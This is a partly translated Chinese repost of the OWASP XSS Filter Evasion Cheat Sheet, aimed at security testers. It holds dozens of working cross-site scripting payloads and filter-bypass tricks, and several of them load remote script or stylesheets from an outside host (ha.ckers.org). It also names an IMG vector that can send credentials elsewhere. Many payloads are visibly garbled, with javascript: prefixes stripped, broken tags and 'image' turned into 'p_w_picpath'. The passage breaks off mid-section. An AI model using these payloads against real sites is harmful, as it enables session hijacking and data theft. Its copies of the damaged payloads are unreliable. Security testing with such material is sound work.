XSS 绕过过滤器大全,
收集、速查表、汇总
XSS Filter Evasion Cheat Sheet
介绍(Introduction):
翻译:落泪红尘 r00ts www.sh3llc0de.com
翻译了一点,有时间再全部翻译
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
这篇文章是协助应用程序安全专业人士测试跨站脚本的一个指南
TEST
这篇小抄是为一些已经知道什么是跨站脚本***的但想更深层次了解filter evasion的人群准备的
XSS 定位 1
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> |
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word “XSS” will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you’re in a rush and need to quickly check a page, often times injecting the depreciated “” tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
</div>
<div></div>
<div></div>
<div></div>
<h2>XSS 定位 2</h2>
<pre>如果你没有太多的空间并知道页面上没有不安全的脚本的地方,可以使用这一个检测XSS注入的语句 .注射后查看源码 <XSS verses >检查有没有XSS漏洞 :</pre>
<pre>'';!--"<XSS>=&{()}</pre>
<h2>无过滤</h2>
<div>
这是一个正常的XSS脚本注入,也是最有可能被过滤的,但是我推荐如果要测试,先尝试这一个(在现在这个时代的浏览器,引号并不是必须的,所以在这里省略了引号):
</div>
<pre><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></pre>
<h2>Image XSS using the JavaScript directive 图像跨站脚本使用的指令</h2>
<div>
Image XSS using the JavaScript directive (IE7.0 doesn’t support the JavaScript directive in context of an p_w_picpath, but it does in other contexts, but the following show the principles that would work in other tags as well:
</div>
<pre><IMG SRC="alert('XSS');">< /pre>
<h2>No quotes and no semicolon</h2><pre><IMG javascript:alert('XSS')>< /pre>
<h2>Case insensitive XSS attack vector</h2><pre><IMG JaVaScRiPt:alert('XSS')>< /pre>
<h2>HTML entities</h2>
<div>
The semicolons are required for this to work:
</div><pre><IMG javascript:alert("XSS")>< /pre>
<h2>Grave accent obfuscation</h2>
<div>
If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string – this is also useful because lots of cross site scripting filters don’t know about grave accents:
</div><pre><IMG SRC=`alert("RSnake says, 'XSS'")`></pre>
<h2>Malformed IMG tags</h2>
<div>
Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:
</div><pre><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></pre>
<h2>fromCharCode</h2>
<div>
if no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:
</div><pre><IMG javascript:alert(String.fromCharCode(88,83,83))>< /pre>
<h2>UTF-8 Unicode encoding</h2>
<div>
all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS
Calculator for more information:
</div><pre><IMG SRC=javascript:alert(</pre><pre>'XSS')></pre>
<h2>Long UTF-8 Unicode encoding without semicolons</h2>
<div>
This is often effective in XSS that attempts to look for “&#XX;”, since most people don’t know about padding – up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I’ve seen this in the wild):
</div><pre><IMG SRC=javascript:a&</pre><pre>#0000108ert('XSS')></pre>
<h2>Hex encoding without semicolons</h2>
<div>
This is also a viable XSS attack against the above string $tmp_string =~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol – which is not true with hex HTML characters). Use the XSS
calculator for more information:
</div><pre><IMG SRC=javascript:alert('XSS')></pre>
<h2>Embedded tab</h2>
<div>
Used to break up the cross site scripting attack:
</div><pre><IMG SRC="jav ascript:alert('XSS');"></pre>
<h2>Embedded Encoded tab</h2>
<div>
Use this one to break up XSS :
</div><pre><IMG SRC="jav	ascript:alert('XSS');"></pre>
<h2>Embedded newline to break up XSS</h2>
<div>
Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
</div><pre><IMG SRC="jav
ascript:alert('XSS');"></pre>
<h2>Embedded carriage return to break up XSS</h2>
<div>
(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I’ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
</div><pre><IMG SRC="jav
ascript:alert('XSS');"></pre>
<h2>Null breaks up JavaScript directive</h2>
<div>
Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00is much more useful and helped me bypass certain real world filters with a variation on this example:
</div><pre>perl -e 'print "<IMG java\0script:alert(\"XSS\")>";' > out</pre>
<h2>Spaces and meta chars before the JavaScript in p_w_picpaths for XSS</h2>
<div>
This is useful if the pattern match doesn’t take into account spaces in the word “javascript:” -which is correct since that won’t render- and makes the false assumption that you can’t have a space between the quote and the “javascript:” keyword. The actual reality is you can have any char from 1-32 in decimal:
</div><pre><IMG SRC="  alert('XSS');">< /pre>
<h2>Non-alpha-non-digit XSS</h2>
<div>
The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example “<SCRIPT\s” != “<SCRIPT/XSS\s”:
</div><pre><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<div>
Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc…) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
</div><pre><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></pre>
<div>
Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
</div><pre><SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT></pre>
<h2>Extraneous open brackets</h2>
<div>
Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:
</div><pre><<SCRIPT>alert("XSS");//<</SCRIPT></pre>
<h2>No closing script tags</h2>
<div>
In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don’t actually need the “></SCRIPT>” portion of this Cross Site Scripting vector. Firefox assumes it’s safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn’t effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they’re not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
</div><pre><SCRIPT SRC=http://ha.ckers.org/xss.js?< B ></pre>
<h2>Protocol resolution in script tags</h2>
<div>
This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh’s protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The “.j” is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
</div><pre><SCRIPT SRC=//ha.ckers.org/.j></pre>
<h2>Half open HTML/JavaScript XSS vector</h2>
<div>
Unlike Firefox the IE rendering engine doesn’t add extra data to your page, but it does allow the javascript: directive in p_w_picpaths. This is useful as a vector because it doesn’t require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close “>” tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn’t require the end “>”. As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:
</div><pre><IMG SRC="alert('XSS')"< /pre>
<h2>Double open angle brackets</h2>
<div>
Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won’t:
</div><pre><iframe src=http://ha.ckers.org/scriptlet.html <</pre>
<h2>Escaping JavaScript escapes</h2>
<div>
When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a=”\\”;alert(‘XSS’);//”;</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:
</div><pre>\";alert('XSS');//</pre>
<h2>End title tag</h2>
<div>
This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:
</div><pre></TITLE><SCRIPT>alert("XSS");</SCRIPT></pre>
<h2>INPUT p_w_picpath</h2><pre><INPUT TYPE="IMAGE" SRC="alert('XSS');">< /pre>
<h2>BODY p_w_picpath</h2><pre><BODY BACKGROUND="alert('XSS')">< /pre>
<h2>IMG Dynsrc</h2><pre><IMG DYNSRC="alert('XSS')">< /pre>
<h2>IMG lowsrc</h2><pre><IMG LOWSRC="alert('XSS')">< /pre>
<h2>List-style-p_w_picpath</h2>
<div>
Fairly esoteric issue dealing with embedding p_w_picpaths for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
</div><pre><STYLE>li {list-style-p_w_picpath: url("alert('XSS')");}< /STYLE><UL><LI>XSS</br></pre>
<h2>VBscript in an p_w_picpath</h2><pre><IMG SRC='vbscript:msgbox("XSS")'></pre>
<h2>Livescript (older versions of Netscape only)</h2><pre><IMG SRC="livescript:[code]"></pre>
<h2>BODY tag</h2>
<div>
Method doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (" != "onload ="):
</div><pre><BODY ONLOAD=alert('XSS')></pre>
<h2>Event Handlers</h2>
<div>
<code><font face="NSimsun">It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates: </font></code>
</div><pre> 1. FSCommand() (attacker can use this when executed from within an embedded Flash object)</pre><pre> 2. onAbort() (when user aborts the loading of an p_w_picpath)</pre><pre> 3. onActivate() (when object is set as the active element)</pre><pre> 4. onAfterPrint() (activates after user prints or previews print job)</pre><pre> 5. onAfterUpdate() (activates on data object after updating data in the source object)</pre><pre> 6. onBeforeActivate() (fires before the object is set as the active element)</pre><pre> 7. onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand ("Copy") function)</pre><pre> 8. onBeforeCut() (attacker executes the attack string right before a selection is cut)</pre><pre> 9. onBeforeDeactivate() (fires right after the activeElement is changed from the current object)</pre><pre> 10. onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)</pre><pre> 11. onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)</pre><pre> 12. onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).</pre><pre> 13. onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)</pre><pre> 14. onBegin() (the onbegin event fires immediately when the element's timeline begins)</pre><pre> 15. onBlur() (in the case where another popup is loaded and window looses focus)</pre><pre> 16. onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)</pre><pre> 17. onCellChange() (fires when data changes in the data provider)</pre><pre> 18. onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)</pre><pre> 19. onClick() (someone clicks on a form)</pre><pre> 20. onContextMenu() (user would need to right click on attack area)</pre><pre> 21. onControlSelect() (fires when the user is about to make a control selection of the object)</pre><pre> 22. onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)</pre><pre> 23. onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)</pre><pre> 24. onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)</pre><pre> 25. onDataSetChanged() (fires when the data set exposed by a data source object changes)</pre><pre> 26. onDataSetComplete() (fires to indicate that all data is available from the data source object)</pre><pre> 27. onDblClick() (user double-clicks a form element or a link)</pre><pre> 28. onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)</pre><pre> 29. onDrag() (requires that the user drags an object)</pre><pre> 30. onDragEnd() (requires that the user drags an object)</pre><pre> 31. onDragLeave() (requires that the user drags an object off a valid location)</pre><pre> 32. onDragEnter() (requires that the user drags an object into a valid location)</pre><pre> 33. onDragOver() (requires that the user drags an object into a valid location)</pre><pre> 34. onDragDrop() (user drops an object (e.g. file) onto the browser window)</pre><pre> 35. onDrop() (user drops an object (e.g. file) onto the browser window)</pre><pre> 36. onEnd() (the onEnd event fires when the timeline ends.</pre><pre> 37. onError() (loading of a document or p_w_picpath causes an error)</pre><pre> 38. onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)</pre><pre> 39. onFilterChange() (fires when a visual filter completes state change)</pre><pre> 40. onFinish() (attacker can create the exploit when marquee is finished looping)</pre><pre> 41. onFocus() (attacker executes the attack string when the window gets focus)</pre><pre> 42. onFocusIn() (attacker executes the attack string when window gets focus)</pre><pre> 43. onFocusOut() (attacker executes the attack string when window looses focus)</pre><pre> 44. onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)</pre><pre> 45. onKeyDown() (user depresses a key)</pre><pre> 46. onKeyPress() (user presses or holds down a key)</pre><pre> 47. onKeyUp() (user releases a key)</pre><pre> 48. onLayoutComplete() (user would have to print or print preview)</pre><pre> 49. onLoad() (attacker executes the attack string after the window loads)</pre><pre> 50. onLoseCapture() (can be exploited by the releaseCapture() method)</pre><pre> 51. onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)</pre><pre> 52. onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)</pre><pre> 53. onMouseDown() (the attacker would need to get the user to click on an p_w_picpath)</pre><pre> 54. onMouseEnter() (cursor moves over an object or area)</pre><pre> 55. onMouseLeave() (the attacker would need to get the user to mouse over an p_w_picpath or table and then off again)</pre><pre> 56. onMouseMove() (the attacker would need to get the user to mouse over an p_w_picpath or table)</pre><pre> 57. onMouseOut() (the attacker would need to get the user to mouse over an p_w_picpath or table and then off again)</pre><pre> 58. onMouseOver() (cursor moves over an object or area)</pre><pre> 59. onMouseUp() (the attacker would need to get the user to click on an p_w_picpath)</pre><pre> 60. onMouseWheel() (the attacker would need to get the user to use their mouse wheel)</pre><pre> 61. onMove() (user or attacker would move the page)</pre><pre> 62. onMoveEnd() (user or attacker would move the page)</pre><pre> 63. onMoveStart() (user or attacker would move the page)</pre><pre> 64. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)</pre><pre> 65. onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)</pre><pre> 66. onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)</pre><pre> 67. onProgress() (attacker would use this as a flash movie was loading)</pre><pre> 68. onPropertyChange() (user or attacker would need to change an element property)</pre><pre> 69. onReadyStateChange() (user or attacker would need to change an element property)</pre><pre> 70. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)</pre><pre> 71. onReset() (user or attacker resets a form)</pre><pre> 72. onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre><pre> 73. onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre><pre> 74. onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)</pre><pre> 75. onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)</pre><pre> 76. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)</pre><pre> 77. onRowsEnter() (user or attacker would need to change a row in a data source)</pre><pre> 78. onRowExit() (user or attacker would need to change a row in a data source)</pre><pre> 79. onRowDelete() (user or attacker would need to delete a row in a data source)</pre><pre> 80. onRowInserted() (user or attacker would need to insert a row in a data source)</pre><pre> 81. onScroll() (user would need to scroll, or attacker could use the scrollBy() function)</pre><pre> 82. onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)</pre><pre> 83. onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)</pre><pre> 84. onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)</pre><pre> 85. onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)</pre><pre> 86. onStart() (fires at the beginning of each marquee loop)</pre><pre> 87. onStop() (user would need to press the stop button or leave the webpage)</pre><pre> 88. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)</pre><pre> 89. onSubmit() (requires attacker or user submits a form)</pre><pre> 90. onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)</pre><pre> 91. onTrackChange() (user or attacker changes track in a playList)</pre><pre> 92. onUnload() (as the user clicks any link or presses the back button or attacker forces a click)</pre><pre> 93. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)</pre><pre> 94. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)</pre>
<h2>BGSOUND</h2><pre><BGSOUND SRC="alert('XSS');">< /pre>
<h2>& JavaScript includes</h2><pre><BR SIZE="&{alert('XSS')}"></pre>
<h2>STYLE sheet</h2><pre><LINK REL="stylesheet" HREF="alert('XSS');">< /pre>
<h2>Remote style sheet</h2>
<div>
(using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
</div><pre><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></pre>
<h2>Remote style sheet part 2</h2>
<div>
This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
</div><pre><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></pre>
<h2>Remote style sheet part 3</h2>
<div>
This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
</div><pre><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></pre>
<h2>Remote style sheet part 4</h2>
<div>
This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
</div><pre><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></pre>
<h2>STYLE tags with broken up JavaScript for XSS</h2>
<div>
This XSS at times sends IE into an infinite loop of alerts:
</div><pre><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></pre>
<h2>STYLE attribute using a comment to break up expression</h2>
<div>
Created by Roman Ivanov
</div><pre><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></pre>
<h2>IMG STYLE with expression</h2>
<div>
This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
</div><pre>exp/*<A STYLE='no\xss:noxss("*//*");</pre><pre>xss:ex/*XSS*//*/*/pression(alert("XSS"))'></pre>
<h2>STYLE tag (Older versions of Netscape only)</h2><pre><STYLE TYPE="text/javascript">alert('XSS');</STYLE></pre>
<h2>STYLE tag using background-p_w_picpath</h2><pre><STYLE>.XSS{background-p_w_picpath:url("alert('XSS')");}< /STYLE><A></A></pre>
<h2>STYLE tag using background</h2><pre><STYLE type="text/css">BODY{url("javascript:alert('XSS')")}< /STYLE></pre>
<div>
<STYLE type="text/css">BODY{url("javascript:alert('XSS')")}< /STYLE>
</div>
<h2>Anonymous HTML with STYLE attribute</h2>
<div>
IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
</div><pre><XSS STYLE="xss:alert('XSS'))">< /pre>
<h2>Local htc file</h2>
<div>
This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
</div><pre><XSS STYLE=" url(xss.htc);">< /pre>
<h2>US-ASCII encoding</h2>
<div>
US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
</div><pre>¼script¾alert(¢XSS¢)¼/script¾</pre>
<h2>META</h2>
<div>
The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
</div><pre><META HTTP-EQUIV="refresh" CONTENT="0;javascript:alert('XSS');">< /pre>
<h3>META using data</h3>
<div>
Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see
RFC 2397 for more details or go here or here to encode your own. You can also use the XSS
calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:
</div><pre><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></pre>
<h3>META with additional URL parameter</h3>
<div>
If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):
</div><pre><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;javascript:alert('XSS');">< /pre>
<h2>IFRAME</h2>
<div>
If iframes are allowed there are a lot of other XSS problems as well:
</div><pre><IFRAME SRC="alert('XSS');">< /IFRAME></pre>
<h2>FRAME</h2>
<div>
Frames have the same sorts of XSS problems as iframes
</div><pre><FRAMESET><FRAME SRC="alert('XSS');">< /FRAMESET></pre>
<h2>TABLE</h2><pre><TABLE BACKGROUND="alert('XSS')">< /pre>
<h3>TD</h3>
<div>
Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
</div><pre><TABLE><TD BACKGROUND="alert('XSS')">< /pre>
<h2>DIV</h2>
<h3>DIV background-p_w_picpath</h3><pre><DIV STYLE="background-p_w_picpath: javascript:alert('XSS'))">< /pre>
<h3>DIV background-p_w_picpath with unicoded XSS exploit</h3>
<div>
This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
</div><pre><DIV STYLE="background-p_w_picpath:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></pre>
<h3>DIV background-p_w_picpath plus extra characters</h3>
<div>
Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
</div><pre><DIV STYLE="background-p_w_picpath: url(alert('XSS'))">< /pre>
<h3>DIV expression</h3>
<div>
A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
</div><pre><DIV STYLE="width: alert('XSS'));">< /pre>
<h2>Downlevel-Hidden block</h2>
<div>
Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
</div><pre><!--[if gte IE 4]></pre><pre> <SCRIPT>alert('XSS');</SCRIPT></pre><pre> <![endif]--></pre>
<h2>BASE tag</h2>
<div>
Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed p_w_picpaths like "p_w_picpaths/p_w_picpath.jpg" rather than full paths. If the path includes a leading forward slash like "/p_w_picpaths/p_w_picpath.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):
</div><pre><BASE HREF="alert('XSS'); //"></pre>
<h2>OBJECT tag</h2>
<div>
If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
</div><pre> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></pre>
<h2>Using an EMBED tag you can embed a Flash movie that contains XSS</h2>
<div>
Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
</div><pre>EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:</pre><pre>org/xss.swf" AllowScriptAccess="always"></EMBED></pre>
<h2>You can EMBED SVG which can contain your XSS vector</h2>
<div>
This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
</div><pre><EMBED SRC="data:p_w_picpath/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="p_w_picpath/svg+xml" AllowScriptAccess="always"></EMBED></pre>
<h2>Using ActionScript inside flash can obfuscate your XSS vector</h2><pre>a="get";</pre><pre>b="URL(\"";</pre><pre>c="javascript:";</pre><pre>d="alert('XSS');\")";</pre><pre>eval(a+b+c+d);</pre>
<h2>XML data island with CDATA obfuscation</h2>
<div>
This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:
</div><pre><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML></pre><pre><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></pre>
<h2>Locally hosted XML with embedded JavaScript that is generated using an XML data island</h2>
<div>
This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
</div><pre><XML SRC="xsstest.xml" ID=I></XML></pre><pre><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></pre>
<h2>HTML+TIME in XML</h2>
<div>
This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
</div><pre><HTML><BODY></pre><pre><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"></pre><pre><?import namespace="t" implementation="#default#time2"></pre><pre><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></pre><pre></BODY></HTML></pre>
<div></div>
<h2>Assuming you can only fit in a few characters and it filters against ".js"</h2>
<div>
you can rename your JavaScript file to an p_w_picpath as an XSS vector:
</div><pre><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></pre>
<div></div>
<h2>SSI (Server Side Includes)</h2>
<div>
This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
</div><pre><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--></pre>
<div></div>
<h2>PHP</h2>
<div>
Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
</div><pre><? echo('<SCR)';</pre><pre>echo('IPT>alert("XSS")</SCRIPT>'); ?></pre>
<div></div>
<h2>IMG Embedded commands</h2>
<div>
This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
